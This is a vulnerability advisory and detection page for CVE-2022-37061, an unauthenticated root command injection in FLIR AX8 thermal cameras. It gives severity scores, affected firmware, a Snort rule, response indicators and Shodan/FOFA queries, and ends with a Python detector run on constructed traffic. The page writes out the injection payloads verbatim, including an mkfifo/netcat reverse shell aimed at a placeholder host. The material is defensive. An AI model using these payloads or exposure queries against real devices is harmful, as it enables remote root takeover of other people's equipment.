CVE-2022-37061
published 2022-08-18

Priority: P1 · 92 · critical
CVSS 3.1: 9.8 (AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H)
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 99.62% (99.9th percentile)
All FLIR AX8 thermal sensor cameras up to and including firmware version 1.46.16 are vulnerable to remote command injection. The flaw can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint, so a successful exploit gives the attacker arbitrary command execution on the underlying operating system with root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the reported vulnerability. The latest firmware version, 1.55.16, was released in June 2024 (as of October 2025).

Affected

1 range
Vendor | Product | Version range | Fixed in
flir | flir_ax8_firmware | <= 1.46.16 | (none listed)

Detection & IOCs (extracted from sources)

url: /res.php
command: action=alarm&id=2;id
command: action=alarm&id=2;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff
path: /login/dologin
snort: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:8; content:"/res.php"; fast_pattern; http.request_body; content:"action|3d|alarm"; content:"id|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.cve.org/CVERecord?id=CVE-2022-37061; reference:cve,2022-37061; classtype:attempted-admin; sid:2065895; rev:1; metadata:affected_product FLIR, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_24, cve CVE_2022_37061, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_24, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara (given by the source as a regex over the HTTP response body, not as a YARA rule): 'uid=([0-9(a-z)]+)' AND 'gid=([0-9(a-z)]+)' AND 'visualBeep'
  • Look for HTTP POST requests to /res.php whose body contains 'action=alarm' and an 'id' parameter value that includes shell metacharacters (;, |, `, $, newline). This is the injection point for CVE-2022-37061.
  • The Emerging Threats Snort rule (sid:2065895) fires on POST /res.php (URI exactly 8 bytes, via bsize:8) with a body matching 'action=alarm' and 'id=' followed by shell metacharacters, raw or URL-encoded, via the PCRE /^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R anchored after the 'id=' match.
  • Successful exploitation produces a response body containing both 'uid=' and 'gid=' output (from the injected 'id' OS command) alongside the string 'visualBeep' from the normal alarm response. Use this combination to distinguish a confirmed exploitation from a mere attempt.
  • The exploit is unauthenticated: no prior login session is required to reach /res.php and inject commands. Monitor for POST requests to /res.php from sources that never established a session.
  • Shodan/FOFA exposure queries for vulnerable devices: Shodan title:"FLIR", FOFA app="FLIR-AX8". Use these to identify internet-exposed instances.
  • The reverse-shell payload uses the classic mkfifo+netcat pattern, URL-encoded in the id parameter: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f. Watch for this pattern in POST bodies or in process trees on the device.
  • The Metasploit module for this CVE uploads and executes a payload to gain root. Look for unexpected file writes or process spawns from the web server process on FLIR AX8 devices.
  • The vulnerability is only present in FLIR AX8 firmware versions up to and including 1.46.16. Firmware 1.49.16 (Jan 2023) and later are not affected.
  • The ET Snort rule (sid:2065895) is scoped to plaintext HTTP traffic only (tls_state plaintext); encrypted HTTPS traffic to the device will not be matched by this rule.
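The following is an added example, not code from this page, from Emerging Threats or from FLIR. It ports the request-side logic of the ET rule above (POST, URI exactly /res.php, action=alarm, id= followed by shell metacharacters before the next '&') and the response-side indicators (uid=, gid=, visualBeep) to Python, then runs both over a handful of constructed request/response events built from the payloads listed in this section. The event layout, the JSON-like response text, and the LHOST/LPORT values 198.51.100.7 and 4444 are assumptions made for the example; the real device's response format is not shown on this page.

```python
import re
from typing import List, Dict, Optional
from urllib.parse import unquote

# Port of the ET rule's PCRE (sid:2065895): from the byte after "id=", consume
# non-"&" characters lazily, then require at least one shell metacharacter,
# raw or URL-encoded: ';' newline '`' '|' '$' (%3B %0A %60 %7C %24).
SHELL_META = re.compile(r"[^&]*?(?:;|%3[Bb]|\n|%0[Aa]|`|%60|\||%7[Cc]|\$|%24)+")

# Response indicators listed on this page: output of the injected `id`
# command plus the 'visualBeep' string from the normal alarm response.
# The character class is taken from the page's regex as written.
UID_RE = re.compile(r"uid=[0-9(a-z)]+")
GID_RE = re.compile(r"gid=[0-9(a-z)]+")


def injection_attempt(method: str, uri: str, body: str) -> bool:
    """True when a request satisfies the rule: POST, URI exactly "/res.php"
    (the rule's bsize:8), body containing action=alarm, and an id= value
    carrying shell metacharacters before the next '&'."""
    if method != "POST" or uri != "/res.php":
        return False
    if "action=alarm" not in body:
        return False
    # The rule anchors its PCRE after the first "id=" it finds; checking every
    # occurrence is a small generalisation that loses no rule hit.
    start = body.find("id=")
    while start != -1:
        if SHELL_META.match(body, start + 3):
            return True
        start = body.find("id=", start + 3)
    return False


def id_parameter(body: str) -> Optional[str]:
    """URL-decoded value of the id parameter, or None when absent."""
    for pair in body.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key == "id":
            return unquote(value)
    return None


def exploit_succeeded(response_body: str) -> bool:
    """True when the response carries uid=/gid= output alongside visualBeep,
    i.e. the injected `id` ran and the alarm handler still answered."""
    return bool(
        UID_RE.search(response_body)
        and GID_RE.search(response_body)
        and "visualBeep" in response_body
    )


# Constructed sample traffic for this example (not captured from a device).
# Sources are documentation addresses; the reverse-shell payload uses
# 198.51.100.7:4444 as the assumed LHOST/LPORT.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"src": "203.0.113.5", "method": "POST", "uri": "/res.php",
     "body": "action=alarm&id=2",
     "resp": '{"visualBeep":"0"}'},                       # benign alarm call
    {"src": "203.0.113.9", "method": "POST", "uri": "/res.php",
     "body": "action=alarm&id=2;id",
     "resp": 'uid=0(root) gid=0(root)\n{"visualBeep":"0"}'},  # probe, succeeded
    {"src": "203.0.113.9", "method": "POST", "uri": "/res.php",
     "body": ("action=alarm&id=2;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20"
              "%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20198.51.100.7%204444%20"
              "%3E%2Ftmp%2Ff"),
     "resp": ""},                                         # reverse shell, no body back
    {"src": "198.51.100.2", "method": "GET", "uri": "/res.php",
     "body": "action=alarm&id=2;id", "resp": ""},        # wrong method, no alert
]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the request rule to each event; where it fires, decode the
    injected command and check the response for the success indicators."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        if not injection_attempt(ev["method"], ev["uri"], ev["body"]):
            continue
        alerts.append({
            "src": ev["src"],
            "command": id_parameter(ev["body"]),
            "confirmed": exploit_succeeded(ev["resp"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Running it yields two alerts from 203.0.113.9: the `2;id` probe is marked confirmed because its response carries uid=/gid= next to visualBeep, while the reverse-shell request is an attempt only, since nothing useful comes back in the HTTP body. As the page notes, this logic sees only plaintext HTTP; apply it where the traffic is decrypted or on the device-side request log.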

CVSS provenance

nvd: v3.1 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL